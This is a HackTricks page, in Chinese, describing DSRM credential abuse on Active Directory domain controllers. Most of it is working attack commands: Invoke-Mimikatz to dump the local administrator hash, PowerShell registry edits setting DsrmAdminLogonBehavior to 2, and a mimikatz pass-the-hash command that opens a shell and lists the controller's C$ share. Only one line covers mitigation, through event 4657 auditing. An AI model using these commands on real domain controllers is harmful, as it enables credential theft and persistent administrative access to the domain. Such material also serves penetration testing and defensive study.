4.7 KiB
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一个网络安全公司工作吗?你想在 HackTricks 中看到你的公司广告吗?或者你想获得PEASS 的最新版本或下载 HackTricks 的 PDF 版本吗?请查看订阅计划!
-
发现我们的独家 NFT 收藏品The PEASS Family
-
加入 💬 Discord 群组 或 telegram 群组,或者在 Twitter 上关注我 🐦@carlospolopm。
-
通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。
DSRM 凭据
每个 DC 中都有一个 本地管理员 帐户。如果在此计算机上具有管理员权限,您可以使用 mimikatz 来转储本地管理员哈希。然后,修改注册表以激活此密码,以便您可以远程访问此本地管理员用户。
首先,我们需要转储 DC 中 本地管理员 用户的哈希:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
然后我们需要检查该帐户是否有效,如果注册表键具有值"0"或不存在,则需要将其设置为"2":
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
然后,使用PTH,您可以列出C$的内容,甚至获取一个shell。请注意,为了在内存中使用该哈希创建一个新的PowerShell会话(用于PTH),使用的“域”只是DC机器的名称:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
更多信息请参考:https://adsecurity.org/?p=1714 和 https://adsecurity.org/?p=1785
缓解措施
- 事件ID 4657 - 审计
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior的创建/更改
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?想要在HackTricks中宣传你的公司吗?或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品——The PEASS Family
-
加入💬 Discord群组 或 Telegram群组,或者关注我在Twitter上的动态🐦@carlospolopm。
-
通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。